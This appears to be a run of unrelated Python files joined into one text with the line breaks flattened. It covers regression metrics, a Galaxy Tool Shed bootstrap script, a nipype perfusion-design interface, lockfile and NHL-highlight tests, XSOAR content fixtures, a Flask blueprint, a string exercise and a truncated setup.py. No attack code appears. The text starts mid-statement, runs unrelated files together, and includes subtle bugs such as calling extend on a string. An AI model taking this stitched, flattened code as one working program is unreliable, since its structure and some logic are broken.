Y_pred_ridge)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Y_test, Y_pred_ridge))) # Training part for Lasso lasso = Lasso(alpha=lasso_alpha, max_iter=10e5) lasso.fit(X_train, Y_train) # Ridge model evaluation Y_pred_lasso = lasso.predict(X_test) df_compare['lasso'] = Y_pred_lasso # Errors and score print('\n', 'Lasso regression model', '\n') print('Number of used coefficients:', np.sum(lasso.coef_ != 0)) print('R squared test Score:', lasso.score(X_test, Y_test)) print('Mean Absolute Error:', metrics.mean_absolute_error(Y_test, Y_pred_lasso)) print('Mean Squared Error:', metrics.mean_squared_error(Y_test, Y_pred_lasso)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Y_test, Y_pred_lasso))) # Plot the differences df_compare.sample(25).plot(kind='bar', figsize=(10, 8)) plt.grid(which='major', linestyle='-', linewidth='0.5', color='green') plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black') # plt.show() plt.savefig('./plots/actual_predicted_difference.png') 1-10 #!/usr/bin/python from __future__ import print_function import optparse import os import sys from six.moves.configparser import ConfigParser from sqlalchemy.exc import OperationalError, ProgrammingError sys.path.insert(1, os.path.join(os.path.dirname(__file__), os.pardir, os.pardir, os.pardir, 'lib')) import galaxy.webapps.tool_shed.model.mapping as tool_shed_model from tool_shed.util import xml_util def check_db(config_parser): dburi = None if config_parser.has_option('app:main', 'database_connection'): dburi = config_parser.get('app:main', 'database_connection') elif config_parser.has_option('app:main', 'database_file'): db_file = config_parser.get('app:main', 'database_file') dburi = "sqlite:///%s?isolation_level=IMMEDIATE" % db_file else: sys.exit('The database configuration setting is missing from the tool_shed.ini file. Add this setting before attempting to bootstrap.') sa_session = None database_exists_message = 'The database configured for this Tool Shed is not new, so bootstrapping is not allowed. ' database_exists_message += 'Create a new database that has not been migrated before attempting to bootstrap.' try: model = tool_shed_model.init(config_parser.get('app:main', 'file_path'), dburi, engine_options={}, create_tables=False) sa_session = model.context.current sys.exit(database_exists_message) except ProgrammingError: pass except OperationalError: pass try: if sa_session is not None: result = sa_session.execute('SELECT version FROM migrate_version').first() if result[0] >= 2: sys.exit(database_exists_message) else: pass except ProgrammingError: pass if config_parser.has_option('app:main', 'hgweb_config_dir'): hgweb_config_parser = ConfigParser() hgweb_dir = config_parser.get('app:main', 'hgweb_config_dir') hgweb_config_file = os.path.join(hgweb_dir, 'hgweb.config') if not os.path.exists(hgweb_config_file): sys.exit(0) hgweb_config_parser.read(hgweb_config_file) configured_repos = hgweb_config_parser.items('paths') if len(configured_repos) >= 1: message = "This Tool Shed's hgweb.config file contains entries, so bootstrapping is not allowed. Delete" message += " the current hgweb.config file along with all associated repositories in the configured " message += "location before attempting to boostrap." sys.exit(message) else: sys.exit(0) else: sys.exit(0) sys.exit(0) def admin_user_info(): user_info_config = os.path.abspath(os.path.join(os.getcwd(), 'scripts/tool_shed/bootstrap_tool_shed', 'user_info.xml')) tree, error_message = xml_util.parse_xml(user_info_config) username = None email = None password = None if tree is None: print("The XML file ", user_info_config, " seems to be invalid, using defaults.") email = '' password = '' username = 'admin' else: root = tree.getroot() for elem in root: if elem.tag == 'email': email = elem.text elif elem.tag == 'password': password = elem.text elif elem.tag == 'username': username = elem.text return (username, email, password) def get_local_tool_shed_url(config_parser): port = '9009' if config_parser.has_section('server:main'): if config_parser.has_option('server:main', 'port'): port = config_parser.get('server:main', 'port') host = '127.0.0.1' print('http://%s:%s' % (host, port)) return 0 def main(args): config_parser = ConfigParser() if os.path.exists(args.config): config_parser.read(args.config) else: return 1 if args.method == 'check_db': return check_db(config_parser) elif args.method == 'admin_user_info': (username, email, password) = admin_user_info() print('%s__SEP__%s__SEP__%s' % (username, email, password)) return 0 elif args.method == 'get_url': return get_local_tool_shed_url(config_parser) else: return 1 parser = optparse.OptionParser() parser.add_option('-c', '--config_file', dest='config', action='store', default='config/tool_shed.yml.sample') parser.add_option('-e', '--execute', dest='method', action='store', default='check_db') (args, options) = parser.parse_args() if __name__ == '__main__': sys.exit(main(args)) 1-10 import os import numpy as np from nipype.interfaces import spm from nipype.interfaces.base import (BaseInterface, BaseInterfaceInputSpec, traits, File, TraitedSpec, Directory, isdefined) from nipype.interfaces.spm.base import scans_for_fnames from nipype.utils.filemanip import filename_to_list, list_to_filename import nibabel from procasl.externals.nistats import hemodynamic_models def _get_perfusion_baseline_regressor(n_frames): regressor = np.ones((n_frames, )) regressor[1::2] *= 0.5 regressor[::2] *= -0.5 return [regressor.tolist()], ['perfusion_baseline'] def _get_perfusion_activation_regressor(condition, condition_name, hrf_model, frame_times, oversampling=16, fir_delays=None, min_onset=-24): """ Parameters ---------- condition : 3-tuple of arrays (onsets, durations, amplitudes) condition_name : str name of the condition hrf_model : {'spm', 'spm + derivative', 'spm + derivative + dispersion', 'glover', 'glover + derivative', 'fir'} Name of the hrf model to be used frame_times : array of shape (n_scans) the desired sampling times oversampling : int, optional oversampling factor to perform the convolution fir_delays : 1D-array-like, optional delays (in seconds) used in case of a finite impulse reponse model min_onset : float, optional minimal onset relative to frame_times[0] (in seconds) events that start before frame_times[0] + min_onset are not considered Returns ------- computed_regressors: array of shape(n_scans, n_reg) computed regressors sampled at frame times reg_names: list of strings corresponding regressor names Notes ----- The different hemodynamic models can be understood as follows: 'spm': this is the hrf model used in SPM 'spm + derivative': SPM model plus its time derivative (2 regressors) 'spm + time + dispersion': idem, plus dispersion derivative (3 regressors) 'glover': this one corresponds to the Glover hrf 'glover + derivative': the Glover hrf + time derivative (2 regressors) 'glover + derivative + dispersion': idem + dispersion derivative (3 regressors) 'fir': finite impulse response basis, a set of delayed dirac models with arbitrary length. This one currently assumes regularly spaced frame times (i.e. fixed time of repetition). It is expected that spm standard and Glover model would not yield large differences in most cases. In case of glover and spm models, the derived regressors are orthogonalized wrt the main one. """ computed_regressors, reg_names = hemodynamic_models.compute_regressor( condition, hrf_model, frame_times, con_id=condition_name, oversampling=oversampling, fir_delays=fir_delays, min_onset=min_onset) computed_regressors[:, 1::2] *= .5 computed_regressors[:, ::2] *= -.5 reg_names = ['perfusion_' + reg_name for reg_name in reg_names] return computed_regressors.T.tolist(), reg_names def compute_perfusion_regressors(conditions, condition_names, hrf_model, frame_times, oversampling=16, fir_delays=None, min_onset=-24): n_frames = frame_times.size perfusions_regressors, perfusion_regressors_names = \ _get_perfusion_baseline_regressor(n_frames) for condition, condition_name in zip(conditions, condition_names): activation_regressors, activation_regressor_names = \ _get_perfusion_activation_regressor( condition, condition_name, hrf_model, frame_times, oversampling=oversampling, fir_delays=fir_delays, min_onset=min_onset) perfusions_regressors.extend(activation_regressors) perfusion_regressors_names.extend(activation_regressor_names) return perfusions_regressors, perfusion_regressors_names class Level1PerfusionDesignInputSpec(BaseInterfaceInputSpec): spm_mat_dir = Directory( exists=True, field='dir', desc='directory to store SPM.mat file (opt)') timing_units = traits.Enum( 'secs', 'scans', field='timing.units', desc='units for specification of onsets', mandatory=True) interscan_interval = traits.Float( field='timing.RT', desc='Interscan interval in secs', mandatory=True) microtime_resolution = traits.Int( field='timing.fmri_t', desc='Number of time-bins per scan in secs (opt)') microtime_onset = traits.Float( field='timing.fmri_t0', desc='The onset/time-bin in seconds for alignment (opt)') session_info = traits.Any( field='sess', desc='Session specific information generated by ' '``modelgen.SpecifyModel``', mandatory=True) factor_info = traits.List( traits.Dict(traits.Enum('name', 'levels')), field='fact', desc='Factor specific information file (opt)') bases = traits.Dict( traits.Enum('hrf', 'fourier', 'fourier_han', 'gamma', 'fir'), field='bases', desc=""" dict {'name':{'basesparam1':val,...}} name : string Name of basis function (hrf, fourier, fourier_han, gamma, fir) hrf : derivs : 2-element list Model HRF Derivatives. No derivatives: [0,0], Time derivatives : [1,0], Time and Dispersion derivatives: [1,1] fourier, fourier_han, gamma, fir: length : int Post-stimulus window length (in seconds) order : int Number of basis functions """, mandatory=True) perfusion_bases = traits.Enum('bases', 'physio', 'none', field='perfusion bases', desc=""" Name of the prf model to be used bases : same as the basis function in bases physio: linear transformation of the basis function. """, mandatory=True) volterra_expansion_order = traits.Enum( 1, 2, field='volt', desc='Model interactions - yes:1, no:2') global_intensity_normalization = traits.Enum( 'none', 'scaling', field='global', desc='Global intensity normalization - scaling or none') mask_image = File( exists=True, field='mask', desc='Image for explicitly masking the analysis') mask_threshold = traits.Either( traits.Enum('-Inf'), traits.Float(), desc="Thresholding for the mask", default='-Inf', usedefault=True) model_serial_correlations = traits.Enum( 'AR(1)', 'FAST', 'none', field='cvi', desc=('Model serial correlations AR(1), FAST or none. FAST ' 'is available in SPM12')) class Level1PerfusionDesignOutputSpec(TraitedSpec): spm_mat_file = File(exists=True, desc='SPM mat file') class Level1PerfusionDesign(BaseInterface): """Generate an SPM design matrix possibly with perfusion regressors. Perfusion regressors consist of - a baseline blood flow reflecting the presence or absence of the inversion tag - BOLD regressors modulated with the baseline blood flow regressor as described in 'Estimation efficiency and statistical power in arterial spin labeling fMRI'. . et al., 2006. Neuroimage 33,p. 103-114. http://www.fil.ion.ucl.ac.uk/spm/doc/manual.pdf#page=59 Examples -------- >>> level1design = Level1PerfusionDesign() >>> level1design.inputs.timing_units = 'secs' >>> level1design.inputs.interscan_interval = 2.5 >>> level1design.inputs.bases = {'hrf':{'derivs': [0,0]}} >>> level1design.inputs.session_info = 'session_info.npz' >>> level1design.run() # doctest: +SKIP """ input_spec = Level1PerfusionDesignInputSpec output_spec = Level1PerfusionDesignOutputSpec _jobtype = 'stats' _jobname = 'fmri_spec' def _format_arg(self, opt, spec, val): """Convert input to appropriate format for spm """ if opt in ['spm_mat_dir', 'mask_image']: return np.array([str(val)], dtype=object) if opt in ['session_info']: #, 'factor_info']: if isinstance(val, dict): return [val] else: return val return super(Level1PerfusionDesign, self)._format_arg(opt, spec, val) def _parse_inputs(self): """validate spm realign options if set to None ignore """ einputs = super(Level1PerfusionDesign, self)._parse_inputs( skip=('mask_threshold')) for sessinfo in einputs[0]['sess']: sessinfo['scans'] = scans_for_fnames(filename_to_list( sessinfo['scans']), keep4d=False) if not isdefined(self.inputs.spm_mat_dir): einputs[0]['dir'] = np.array([str(os.getcwd())], dtype=object) return einputs def _run_interface(self, runtime): # Set the design parameters level1design = spm.Level1Design() level1design.inputs.spm_mat_dir = self.inputs.spm_mat_dir level1design.inputs.timing_units = self.inputs.timing_units level1design.inputs.interscan_interval = self.inputs.interscan_interval level1design.inputs.microtime_resolution =\ self.inputs.microtime_resolution level1design.inputs.microtime_onset = self.inputs.microtime_onset level1design.inputs.session_info = self.inputs.session_info level1design.inputs.factor_info = self.inputs.factor_info level1design.inputs.bases = self.inputs.bases level1design.inputs.volterra_expansion_order = \ self.inputs.volterra_expansion_order level1design.inputs.global_intensity_normalization = \ self.inputs.global_intensity_normalization level1design.inputs.mask_image = self.inputs.mask_image level1design.inputs.mask_threshold = self.inputs.mask_threshold level1design.inputs.model_serial_correlations = \ self.inputs.model_serial_correlations perfusion_bases = self.inputs.perfusion_bases if isdefined(perfusion_bases) and perfusion_bases != 'none': # Compute perfusion regressors tr = self.inputs.interscan_interval # TODO: robustify (check session_info type is list of length 1) if isinstance(self.inputs.session_info, list): session_info = self.inputs.session_info[0] elif isinstance(self.inputs.session_info, str): session_info = self.inputs.session_info else: raise ValueError('session_info trait of Level1Design has type' ' {0}'.format(self.inputs.session_info)) n_scans = nibabel.load(session_info['scans']).get_data().shape[-1] frametimes = np.arange(0, n_scans * tr, tr) if perfusion_bases == 'bases': hrf_model = 'spm' if self.inputs.bases['hrf']['derivs'] == [1, 0]: hrf_model.extend(' + derivative') elif self.inputs.bases['hrf']['derivs'] == [1, 1]: hrf_model.extend(' + derivative + dispersion') else: raise ValueError('physio PRF not implemented yet') condition_names = [c['name'] for c in session_info['cond']] # robustify onsets = [c['onset'] for c in session_info['cond']] durations = [c['duration'] for c in session_info['cond']] if 'amplitude' in session_info['cond'][0].keys(): amplitudes = [c['amplitude'] for c in session_info['cond']] else: amplitudes = [1 for c in session_info['cond']] conditions = zip(onsets, durations, amplitudes) perfusion_regressors, perfusion_regressor_names = \ compute_perfusion_regressors(conditions, condition_names, hrf_model, frametimes) # Add perfusion regressors to model for n, (regressor, regressor_name) in enumerate( zip(perfusion_regressors, perfusion_regressor_names)): session_info['regress'].insert( n, {'val': regressor, 'name': regressor_name}) level1design.inputs.session_info = [session_info] level1design.run() return runtime def _make_matlab_command(self, content): """validates spm options and generates job structure if mfile is True uses matlab .m file else generates a job structure and saves in .mat """ if isdefined(self.inputs.mask_image): # SPM doesn't handle explicit masking properly, especially # when you want to use the entire mask image postscript = "load SPM;\n" postscript += "SPM.xM.VM = spm_vol('%s');\n" % list_to_filename(self.inputs.mask_image) postscript += "SPM.xM.I = 0;\n" postscript += "SPM.xM.T = [];\n" postscript += "SPM.xM.TH = ones(size(SPM.xM.TH))*(%s);\n" % self.inputs.mask_threshold postscript += "SPM.xM.xs = struct('Masking', 'explicit masking only');\n" postscript += "save SPM SPM;\n" else: postscript = None return super(Level1PerfusionDesign, self)._make_matlab_command(content, postscript=postscript) def _list_outputs(self): outputs = self._outputs().get() spm_mat_file = os.path.join(os.getcwd(), 'SPM.mat') outputs['spm_mat_file'] = spm_mat_file return outputs supportal/app/models/__init__.py from .api_key import APIKey from .email import EmailSend from .person import Person from .user import User from .vol_prospect_models import ( MobilizeAmericaEventSignupExcpetion, VolProspectAssignment, VolProspectContactEvent, ) MarcoMontaltoMonella/Sandpilessrc/__init__.py __version__= "0.1" import os import pytest from lockfile import LockFile, LockFileError def test_file_not_found(): with pytest.raises(FileNotFoundError): LockFile('/path/to/inexistent/file') def test_diretory_as_filename(): with pytest.raises(IsADirectoryError): LockFile('/') def test_lock_resource(): lock = LockFile('/tmp/test_lockfile.lock') lock.lock(2) assert lock.is_locked def test_lock_locked_resource(): lock = LockFile('/tmp/test_lockfile.lock') lock.lock(2) with pytest.raises(LockFileError): lock.lock(2) def test_unlock_resource(): lock = LockFile('/tmp/test_lockfile.lock') lock.lock(2) lock.unlock(2) assert not lock.is_locked def test_unlock_with_wrong_resource(): lock = LockFile('/tmp/test_lockfile.lock') lock.lock(2) with pytest.raises(ValueError): lock.unlock(1) def test_lock_already_initialized_resource(): with open('/tmp/test_lockfile.lock', 'w') as f: f.write('{"lock": false, "id": 0}') lock = LockFile('/tmp/test_lockfile.lock', False) lock.lock(2) assert lock.is_locked def test_lock_already_initialized_and_locked_resource(): with open('/tmp/test_lockfile.lock', 'w') as f: f.write('{"lock": true, "id": 0}') lock = LockFile('/tmp/test_lockfile.lock', False) with pytest.raises(LockFileError): lock.lock(2) import re import hangups def isEventNotification(update): if update.event_notification: return True return False def isMessageEvent(update): if isEventNotification(update): event = update.event_notification.event if event.event_type == hangups.hangouts_pb2.EVENT_TYPE_REGULAR_CHAT_MESSAGE: return True return False def newConversationFilter(conversationIdList): return lambda event: hangups.ConversationEvent(event).conversation_id in conversationIdList def newMessageFilter(regex): pattern = re.compile(regex) return lambda event: bool(pattern.match(hangups.ChatMessageEvent(event).text)) def newUserFilter(gaiaIdList): return lambda event: hangups.ConversationEvent(event).user_id.gaia_id in gaiaIdList import json import pathlib import unittest from collections import OrderedDict from datetime import datetime from nhlsuomi.reddit import icydata class Test_icydata(unittest.TestCase): def setUp(self): if not hasattr(self, 'submissions'): path = pathlib.Path(__file__).parent / 'icydata.json' self.submissions = json.loads(path.read_text()) def test_hilights(self): self.assertIsNotNone(self.submissions) keywords = ['Laine', 'Korpisalo'] hilights, _ = icydata.parse_hilights_recaps( self.submissions, keywords, 18, _now=lambda: datetime(2019, 11, 23) ) expected = [ ( 'Laine scores goal', 'https://wscdsszoominwestus.azureedge.net/publish/d663e54d-db5e-4c7d-b3d8-9a0b548aebd4.mp4', ), ( 'Korpisalo makes save', 'https://wscdsszoominwestus.azureedge.net/publish/6efb1f8b-0e2d-498a-aaae-839980d3139c.mp4', ), ( 'Ristolainen scores PPG', 'https://wscdsszoominwestus.azureedge.net/publish/4a64f0f7-c9cf-4e2c-acef-57439a4bcd71.mp4', ) ] self.assertEqual(hilights, expected) def test_no_hilights(self): self.assertIsNotNone(self.submissions) keywords = ['Laine', 'Korpisalo'] hilights, _ = icydata.parse_hilights_recaps( self.submissions, keywords, 18, _now=lambda: datetime(2019, 11, 24) ) expected = [] self.assertEqual(hilights, expected) def test_recaps(self): self.assertIsNotNone(self.submissions) _, recaps = icydata.parse_hilights_recaps( self.submissions[:2], [], 18 ) expected = OrderedDict() expected['PITNJD'] = 'https://hlslive-wsczoominwestus.med.nhl.com/publish/056ae7ef-ac8a-4597-9e2a-caeedfbec847.mp4' expected['OTTNYR'] = 'https://hlslive-wsczoominwestus.med.nhl.com/publish/b00a68fd-caac-40e7-a232-50b72fefb70a.mp4' self.assertEqual(recaps, expected) project_name/ext/restapi/__init__.py from flask import Blueprint from flask_restful import Api from .resources import ProductItemResource, ProductResource bp = Blueprint("restapi", __name__, url_prefix="/api/v1") api = Api(bp) def init_app(app): api.add_resource(ProductResource, "/product/") api.add_resource(ProductItemResource, "/product/") app.register_blueprint(bp) 0 OLD_CLASSIFIER = { "brandName": "test", "custom": True, "defaultIncidentType": "", "id": "test classifier", "keyTypeMap": { "test": "test1" }, "mapping": { "Logz.io Alert": { "dontMapEventToLabels": False, "internalMapping": { "test Alert ID": { "complex": None, "simple": "alertId" }, "details": { "complex": None, "simple": "description" } } } }, "transformer": { "complex": None, "simple": "test" }, "unclassifiedCases": {}, "version": -1, "fromVersion": "5.0.0", "toVersion": "5.9.9" } NEW_CLASSIFIER = { "defaultIncidentType": "test", "id": "testing", "type": "classification", "name": "test Classifier", "description": "Classifies test.", "keyTypeMap": { "test": "test1" }, "transformer": { "complex": None, "simple": "test" }, "version": -1, "fromVersion": "6.0.0", "toVersion": "6.0.5" } MAPPER = { "defaultIncidentType": "test", "id": "test Mapper", "type": "mapping-incoming", "name": "test Mapper", "description": "Mapper test", "mapping": { "test": { "dontMapEventToLabels": False, "internalMapping": { "test Alert ID": { "complex": None, "simple": "alertId" } } } }, "version": -1, "fromVersion": "6.0.0", "toVersion": "6.0.5" } DASHBOARD = { "id": "my-dashboard", "version": -1, "fromVersion": "5.0.0", "description": "", "period": { "byTo": "", "byFrom": "days", "toValue": None, "fromValue": 7, "field": "" }, "fromDateLicense": "0001-01-01T00:00:00Z", "name": "my-dashboard", "layout": [ { "id": "a0e381e0-1c86-11e8-8581-45a91cd24d8e", "forceRange": True, "x": 8, "y": 0, "i": "a0e381e0-1c86-11e8-8581-45a91cd24d8e", "w": 4, "h": 4, "widget": { "id": "my-tasks", "version": 1, "modified": "2018-02-28T14:55:09.423998+02:00", "name": "My Tasks", "dataType": "tasks", "widgetType": "list", "query": "assignee:\"{me}\" and (state:Waiting or state:inprogress or state:error)", "sort": [ { "field": "dueDate", "asc": True } ], "isPredefined": True, "dateRange": { "fromDate": "0001-01-01T00:00:00Z", "toDate": "0001-01-01T00:00:00Z", "period": { "byTo": "", "byFrom": "days", "toValue": None, "fromValue": None, "field": "" }, "fromDateLicense": "0001-01-01T00:00:00Z" }, "params": None, "size": 10, "category": "" } }, ], "isPredefined": True } CONNECTION = { "canvasContextConnections": [ { "contextKey1": "MD5", "contextKey2": "SHA256", "connectionDescription": "Belongs to the same file", "parentContextKey": "File" }, { "contextKey1": "MD5", "contextKey2": "SHA1", "connectionDescription": "Belongs to the same file", "parentContextKey": "File" }, ] } INDICATOR_FIELD = { "id": "indicator_field", "version": -1, "modified": "2020-04-30T12:08:12.502031832Z", "fromVersion": "5.5.0", "name": "indicator_field", "ownerOnly": False, "placeholder": "", "description": "", "cliName": "indicator", "type": "singleSelect", "closeForm": False, "editForm": True, "required": False, "script": "", "fieldCalcScript": "", "neverSetAsRequired": False, "isReadOnly": False, "selectValues": [ "1", "2", ], "validationRegex": "", "useAsKpi": True, "locked": False, "system": False, "content": True, "group": 2, "hidden": False, "associatedTypes": [ "Employee" ], "systemAssociatedTypes": None, "associatedToAll": False, "unmapped": False, "unsearchable": True, "caseInsensitive": True, "columns": None, "defaultRows": None, "sla": 0, "threshold": 72, "breachScript": "" } INCIDENT_TYPE = { "id": "incident_type", "version": -1, "locked": False, "name": "incident_type", "prevName": "incident_type", "color": "#32d296", "playbookId": "my-playbook", "hours": 0, "days": 0, "weeks": 0, "hoursR": 0, "daysR": 0, "weeksR": 0, "system": False, "readonly": False, "default": False, "autorun": False, "preProcessingScript": "", "closureScript": "", "disabled": False, "reputationCalc": 0, "fromVersion": "5.5.0" } LAYOUT = { "TypeName": "my-layout", "kind": "details", "fromVersion": "5.0.0", "toVersion": "5.9.9", "layout": { "TypeName": "", "id": "my-layout", "kind": "details", "modified": "2019-09-22T11:09:50.039511463Z", "name": "", "system": False, "tabs": [ { "id": "caseinfoid", "name": "Incident Info", "sections": [ { "displayType": "ROW", "h": 2, "i": "caseinfoid", "isVisible": True, "items": [ { "endCol": 2, "fieldId": "type", "height": 24, "id": "incident-type-field", "index": 0, "startCol": 0 }, ], "moved": False, "name": "Details", "static": False, "w": 1, "x": 0, "y": 0 }, ], "type": "custom", "hidden": False }, ], "typeId": "some-id", "version": -1 }, "typeId": "some-id", "version": -1 } LAYOUTS_CONTAINER = { "id": "my_layoutscontainer", "name": "my_layoutscontainer", "group": "incident", "description": "description", "fromVersion": "6.0.0", "detailsV2": { "tabs": [ { "id": "caseinfoid", "name": "Incident Info", "sections": [ { "displayType": "ROW", "h": 2, "i": "caseinfoid", "isVisible": True, "items": [ { "endCol": 2, "fieldId": "type", "height": 24, "id": "incident-type-field", "index": 0, "startCol": 0 }, ], "moved": False, "name": "Details", "static": False, "w": 1, "x": 0, "y": 0 }, ], "type": "custom", "hidden": False }, ] }, "version": -1 } REPORT = { "id": "report", "name": "report", "description": "", "fromVersion": "5.0.0", "tags": [], "createdBy": "DBot", "type": "pdf", "modified": "2018-01-24T15:27:36.431127302Z", "startDate": "0001-01-01T00:00:00Z", "times": 0, "recurrent": False, "endingDate": "0001-01-01T00:00:00Z", "timezoneOffset": 0, "cronView": False, "scheduled": False, "system": True, "locked": False, "sections": [ { "layout": { "tableColumns": [ "name", "occurred", "type", "owner", "severity", "status", "dueDate" ], "readableHeaders": { "name": "Name", "occurred": "Occurred", "type": "Type", "owner": "Owner", "severity": "Severity", "status": "Status", "dueDate": "Due Date" }, "classes": "striped stackable small very compact", "i": "1", "rowPos": 6, "columnPos": 0, "w": 12, "h": 2 }, "query": { "type": "incident", "filter": { "query": "-status:Closed and (severity:High or severity:Critical)", "period": { "byFrom": "days", "fromValue": None, "by": "day" }, "fromDate": None, "toDate": None } }, "type": "table", "title": "Critical and High Incidents" }, ], "recipients": [], "orientation": "portrait", "paperSize": "A4", "runOnce": None, "latestReportName": "", "latestReportTime": "0001-01-01T00:00:00Z", "latestScheduledReportTime": "0001-01-01T00:00:00Z", "nextScheduledTime": "0001-01-01T00:00:00Z", "latestReportUsername": "", "decoder": { "evidences.fetched": { "type": "date", "value": "02/01/06 3:04:05 PM" }, }, "reportType": "", "sensitive": False, "runningUser": "", "dashboard": { "id": "", "version": 0, "modified": "0001-01-01T00:00:00Z", "fromDate": "0001-01-01T00:00:00Z", "toDate": "0001-01-01T00:00:00Z", "period": { "byTo": "", "byFrom": "days", "toValue": None, "fromValue": None, "field": "" }, "fromDateLicense": "0001-01-01T00:00:00Z", "name": "Critical and High incidents", "layout": [ { "id": "2", "forceRange": False, "x": 0, "y": 0, "i": "2", "w": 12, "h": 1, "widget": { "id": "58", "version": 1, "modified": "2018-01-23T16:42:36.157893339Z", "name": "criticalAndHighIncidents Headline", "dataType": "incidents", "widgetType": "text", "query": "-status:Closed and (severity:High or severity:Critical)", "isPredefined": False, "dateRange": { "fromDate": "0001-01-01T00:00:00Z", "toDate": "0001-01-01T00:00:00Z", "period": { "byTo": "", "byFrom": "days", "toValue": None, "fromValue": None, "field": "" }, "fromDateLicense": "0001-01-01T00:00:00Z" }, "params": { "text": "# **Critical and High incidents**\n\n{date}\n\n---" }, "size": 0 } }, ], "isPredefined": False } } REPUTATION = { "id": "reputation", "version": -1, "fromVersion": "5.5.0", "modified": "2019-07-18T08:57:51.058271942Z", "sortValues": None, "commitMessage": "", "shouldPublish": False, "shouldCommit": False, "regex": "", "details": "reputation", "prevDetails": "reputation", "reputationScriptName": "", "reputationCommand": "", "enhancementScriptNames": [], "system": False, "locked": False, "disabled": False, "file": False, "updateAfter": 0, "mergeContext": False, "formatScript": "", "contextPath": "", "contextValue": "", "excludedBrands": [], "expiration": 0, "defaultMapping": {}, "manualMapping": None, "fileHashesPriority": None, "legacyNames": ["Malware"] } WIDGET = { "id": "widget", "version": -1, "fromVersion": "5.0.0", "name": "widget", "dataType": "incidents", "widgetType": "bar", "query": "-category:job and -status:archived and -status:closed", "isPredefined": True, "dateRange": { "fromDate": "0001-01-01T00:00:00Z", "toDate": "0001-01-01T00:00:00Z", "period": { "byTo": "", "byFrom": "days", "toValue": None, "fromValue": 7, "field": "" }, "fromDateLicense": "0001-01-01T00:00:00Z" }, "params": { "groupBy": [ "owner" ] }, "description": "" } INCIDENT_FIELD = { "associatedToAll": False, "associatedTypes": [ "Me" ], "breachScript": "", "caseInsensitive": True, "cliName": "incidentfield", "closeForm": False, "columns": None, "content": True, "defaultRows": None, "description": "", "editForm": True, "fieldCalcScript": "", "group": 0, "hidden": False, "id": "incident-field", "isReadOnly": False, "locked": False, "name": "incident-field", "neverSetAsRequired": False, "ownerOnly": False, "placeholder": "", "required": False, "script": "", "selectValues": None, "sla": 0, "system": False, "systemAssociatedTypes": None, "threshold": 72, "type": "shortText", "unmapped": False, "unsearchable": True, "useAsKpi": False, "validationRegex": "", "version": -1, "fromVersion": "5.0.0" } GENERIC_FIELD = { "associatedToAll": False, "associatedTypes": [ "Workstation" ], "caseInsensitive": True, "cliName": "operatingsystem", "id": "generic_asset_operatingsystem", "name": "Operating System", "closeForm": False, "content": True, "editForm": True, "group": 4, "definitionId": "asset", "genericModuleId": "rbvm", "hidden": False, "isReadOnly": False, "locked": False, "neverSetAsRequired": False, "ownerOnly": False, "required": False, "sla": 0, "system": False, "threshold": 72, "type": "shortText", "unmapped": False, "unsearchable": True, "useAsKpi": False, "version": -1, "fromVersion": "6.5.0", "openEnded": False } GENERIC_TYPE = { "id": "Workstation", "layout": "Workstation Layout", "locked": False, "name": "Workstation", "color": "#8052f4", "definitionId": "asset", "genericModuleId": "rbvm", "system": False, "version": -1, "fromVersion": "6.5.0" } GENERIC_MODULE = { "id": "rbvm", "version": -1, "name": "Risk Based Vulnerability Management", "fromVersion": "6.5.0", "definitionIds": [ "asset" ], "views": [{ "icon": "icon-widget-infinity-24-s", "name": "RBVM", "title": "Risk Base Vulnerability Management", "id": "RBVM", "tabs": [ { "name": "Assets", "newButtonDefinitionId": "asset", "dashboard": { "id": "asset_dashboard" } }] }] } UNIFIED_GENERIC_MODULE = { "id": "rbvm", "version": -1, "name": "Risk Based Vulnerability Management", "fromVersion": "6.5.0", "definitionIds": [ "asset" ], "views": [{ "icon": "icon-widget-infinity-24-s", "name": "RBVM", "title": "Risk Base Vulnerability Management", "id": "RBVM", "tabs": [ { "name": "Assets", "newButtonDefinitionId": "asset", "dashboard": { "id": "asset_dashboard", "version": -1, "fromVersion": "5.0.0", "description": "", "period": { "byTo": "", "byFrom": "days", "toValue": None, "fromValue": 7, "field": "" }, "fromDateLicense": "0001-01-01T00:00:00Z", "name": "my-dashboard", "layout": [{ "id": "a0e381e0-1c86-11e8-8581-45a91cd24d8e", "forceRange": True, "x": 8, "y": 0, "i": "a0e381e0-1c86-11e8-8581-45a91cd24d8e", "w": 4, "h": 4, "widget": { "id": "my-tasks", "version": 1, "modified": "2018-02-28T14:55:09.423998+02:00", "name": "My Tasks", "dataType": "tasks", "widgetType": "list", "query": "assignee:\"{me}\" and (state:Waiting or state:inprogress or state:error)", "sort": [ { "field": "dueDate", "asc": True } ], "isPredefined": True, "dateRange": { "fromDate": "0001-01-01T00:00:00Z", "toDate": "0001-01-01T00:00:00Z", "period": { "byTo": "", "byFrom": "days", "toValue": None, "fromValue": None, "field": "" }, "fromDateLicense": "0001-01-01T00:00:00Z" }, "params": None, "size": 10, "category": "" } }, ], "isPredefined": True } }] }] } GENERIC_DEFINITION = { "version": -1, "locked": False, "system": False, "fromVersion": "6.5.0", "id": "assets", "name": "Assets", "partitioned": True, "auditable": False, "rbacSupport": True } EMPTY_ID_SET = { 'scripts': [], 'integrations': [], 'playbooks': [], 'TestPlaybooks': [], 'Classifiers': [], 'Dashboards': [], 'IncidentFields': [], 'IncidentTypes': [], 'IndicatorFields': [], 'IndicatorTypes': [], 'Layouts': [], 'Reports': [], 'Widgets': [], 'Mappers': [], 'GenericTypes': [], 'GenericFields': [], 'GenericModules': [], 'GenericDefinitions': [], 'Packs': [] } cadena = input("\33[0mIngrese una cadena: \33[34m") print("\33[0mPrimeros caracteres:\33[33m", cadena[0:2]) print("\33[0mÚltimos caracteres:\33[33m", cadena[-3:]) print("\33[0mCada 2 caracteres: \33[33m", end='') for i in range(len(cadena)): if i % 2 == 0: print(cadena[i], end='') print("\33[0m") reversa = ''.join(reversed(cadena)) espejo = cadena + reversa print("\33[0mCadena inversa:\33[33m", reversa) print("\33[0mCadena espejo:\33[33m", espejo) print("\33[0m") setup.py import os from setuptools import setup, find_packages path = os.path.abspath(os.path.dirname(__file__)) try: with open(os.path.join(path, 'README.md')) as f: long_description = f.read() except Exception as e: long_description = "customize okta cli" setup( name = "pal-tsne", version = "0.1.0", keywords = ("pip", "tsne", "parallel", "xenos"), description = "parallel tsne", long_description = long_description, long_description_content_type='text/markdown', python_requires=">=3.6.0", license = "MIT Licence", url = "https://github.com/MingChaoXu/paralell-tsne", author = "xenos", author_email = "", packages = find_packages(), include_package_data = 